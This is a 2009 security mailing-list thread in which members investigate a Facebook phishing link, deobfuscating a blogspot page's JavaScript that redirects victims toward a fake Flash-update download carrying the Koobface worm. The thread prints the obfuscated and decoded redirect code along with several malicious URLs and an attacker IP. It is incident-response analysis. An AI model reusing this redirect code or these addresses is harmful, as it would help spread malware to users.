PaulDotCom mailing list archives
phishing question
From: d.auclair at utoronto.ca (David Auclair)
Date: Thu, 3 Dec 2009 08:52:53 -0500
The URL is encoded in this line: n516dc="hfdftfktfffkpfj:gjj/j/gfwwkdwdf.bujkskifnjfekdsgfsginkadboxj.cgojfmfkg.fjafkgugf/jfk3jfk5k7kj/fgg".replace(/[fdkjg]+/g,""); The replace command as used here is basically replacing the specified characters with 'nothing'... so once you've stripped out all the fdkjg characters, this is what's left: n516dc="http://www.businessinabox.com.au/357/"; For anybody who's interested, the full decoded (and somewhat simplified and commented) script is as follows: oa8ea5=eval("document.referrer").indexOf("msplinks.com"); pab=eval("document.referrer").indexOf("myspace.com"); qa53a=eval("document.referrer").indexOf("lnk.ms"); //If the referrer contains any of the above strings, then append '&ms' to the query bf2ebbb9=''; if(oa8ea5+pab+qa53a!=-3)bf2ebbb9='&ms'; location="http://www.businessinabox.com.au/357/?go"+bf2ebbb9; The script at the specified location is what actually redirects to the attack sites... -Dave From: pauldotcom-bounces at pdc-mail.pauldotcom.com [mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com] On Behalf Of Chris Blazek Sent: Wednesday, December 02, 2009 2:28 PM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] phishing question That section you unwrapped looks like it sets a location variable that is then used in the google friend connect stuff. I went looking through the script blocks and I'm not finding any reference to the businessinabox site. How did you get to that point? Just curious, trying to learn. Chris On Wed, Dec 2, 2009 at 1:01 PM, Chris Blazek <chris.blazek at gmail.com<mailto:chris.blazek at gmail.com>> wrote: Thanks! The user sent me a snapshot of symantec finding the koobface infection. I found a mcafee article that mentions the worm on what David found: http://vil.nai.com/vil/content/v_148955.htm I was trying to use malzilla to decode that script block but really didn't have much luck because of my experience with the app. Thanks for the help, great community! Chris On Wed, Dec 2, 2009 at 12:03 PM, David Auclair <d.auclair at utoronto.ca<mailto:d.auclair at utoronto.ca>> wrote: The obfuscation wasn't too bad in this case... Just a couple tricks repeated over and over. I manually 'unwrapped' the layers of obfuscation, and ended up with some pretty simple code. For example: c4239='do'; db749="coaujoimrggh".replace(/[oajirgh]+/g,""); eaf76='ent.r'; f638e36f4="esgkfkusueduvrbo".replace(/[sgkudvbo]+/g,""); gda746b57='rer'; a206c=eval(c4239+db749+eaf76+f638e36f4+gda746b57); Is basically a set of strings containing extra characters, that are stripped out by the replace commands, then merged. This can be simplified to: c4239='do'; db749="cum"; eaf76='ent.r'; f638e36f4="efer"; gda746b57='rer'; a206c=eval("document.referer"); -Dave
-----Original Message----- From: pauldotcom-bounces at mail.pauldotcom.com<mailto:pauldotcom-bounces at mail.pauldotcom.com> [mailto:pauldotcom-bounces at mail.pauldotcom.com<mailto:pauldotcom-bounces at mail.pauldotcom.com>] On Behalf Of David Shpritz Sent: Wednesday, December 02, 2009 12:44 PM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] phishing question Hey David, Would you mind telling us what method you used to deobfuscate the scripts? Usually I have done these by hand or used Malzilla, but I'm always looking for new methods. Thanks! David Shpritz -----Original Message----- From: pauldotcom-bounces at pdc-mail.pauldotcom.com<mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com> [mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com<mailto:pauldotcom-bounces at pdc-mail.pauldotcom.com>] On Behalf Of David Auclair Sent: Wednesday, December 02, 2009 9:45 AM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] phishing question It looks like the javascript on the page you mentioned leads to this page: hxxp://www . businessinabox . com . au/357/?go Which is full of more obfuscated javascript, which leads to sites such as: hxxp:// 62.204.113.141 /d=www.facebook.com/0x3E8/f=fb2/view/console=yes/<http://www.facebook.com/0x3E8/f=fb2/view/console=yes/> Which seems to have 'you need to update your flash player' image, linking to setup.exe According to virustotal, the setup.exe contains koobface: http://www.virustotal.com/analisis/5e9ce9c41a8f46d5dfc4ce366f6f47cb347bcbaa93cd1fcb132a72f61bab14e1- 1259705119 -Dave-----Original Message----- From: pauldotcom-bounces at mail.pauldotcom.com<mailto:pauldotcom-bounces at mail.pauldotcom.com> [mailto:pauldotcom-bounces at mail.pauldotcom.com<mailto:pauldotcom-bounces at mail.pauldotcom.com>] OnBehalfOf Chris Blazek Sent: Wednesday, December 02, 2009 12:04 AM To: PaulDotCom Security Weekly Mailing List Subject: Re: [Pauldotcom] phishing question PJ, Yeah, I had the user change all passwords from the email account to fb. I had tried googling for that 1st part of the address, hoping someone had posted something about it. That came up empty. I tried to get malzilla to decode it, but I really have little experience decoding JavaScript like that. I'll try looking for deobfuscaters to see if something else can decode it. Sorry for the typos in the original email. :) Thanks for the help! Chris On Dec 1, 2009, at 8:47 PM, PJ McGarvey <pj_mcgarvey at hotmail.com<mailto:pj_mcgarvey at hotmail.com>> wrote:Well, if you mean what does the obfuscated code do, there are a few sites I've used that can "de-obfuscate" code however sometimes all that can tell you is that "yeah, it's probably malicious". I would google for "javascript deobfuscate". You could submit the blogspot site to an online sandbox for analysis, like I just did: http://anubis.iseclab.org/?action=result&task_id=1c4a179271c4d4ee4f5b9820e431f7281&format=html and possibly find other URLs found in the de-obfuscated code to see what they do.... like this one http://1nonsensical.cn/?pid=312s02&sid=4db12f ... I've yet to find a .cn domain name I could trust. LOL. Follow down the rabbit hole... That way you can find out if the PC was infected, and how to clean it up. Otherwise it would seem like some sort of facebook worm that spreads using the FB address book. Was the user logged into Facebook at the time? Might be a good idea to change their password, sounds like it either used the active facebook session to send itself out, or maybe a cookie with the user's saved credentials. PJ From: chris.blazek at gmail.com<mailto:chris.blazek at gmail.com> Date: Tue, 1 Dec 2009 14:54:36 -0600 To: pauldotcom at mail.pauldotcom.com<mailto:pauldotcom at mail.pauldotcom.com> Subject: [Pauldotcom] phishing question A coworker clicked on a link in an email and was directed to facebook then redirected to the following site: despatiesmercemerce . blogspot . com All of there fb contacts then received the same email. I pulled up the site in malzilla and noticed a script block in the header that looks like it's obfuscated. I was wondering if someone in the group could figure out what the site was trying to do. Thanks, Chris _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com<mailto:Pauldotcom at mail.pauldotcom.com> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com<mailto:Pauldotcom at mail.pauldotcom.com> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com<mailto:Pauldotcom at mail.pauldotcom.com> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com<mailto:Pauldotcom at mail.pauldotcom.com> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
_______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com<mailto:Pauldotcom at mail.pauldotcom.com> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com -- http://www.kingbin.net/ -- http://www.kingbin.net/ Sent from Lubbock, TX, United States -------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20091203/fac08f9b/attachment.htm
Current thread:
- phishing question Chris Blazek (Dec 01)
- phishing question PJ McGarvey (Dec 01)
- phishing question Chris Blazek (Dec 01)
- phishing question David Auclair (Dec 02)
- phishing question David Shpritz (Dec 02)
- phishing question David Auclair (Dec 02)
- phishing question Chris Blazek (Dec 02)
- phishing question Chris Blazek (Dec 02)
- phishing question David Auclair (Dec 03)
- phishing question Chris Blazek (Dec 01)
- phishing question PJ McGarvey (Dec 01)
- phishing question Chris Blazek (Dec 03)
- phishing question Matt Erasmus (Dec 03)
- phishing question Jim Halfpenny (Dec 04)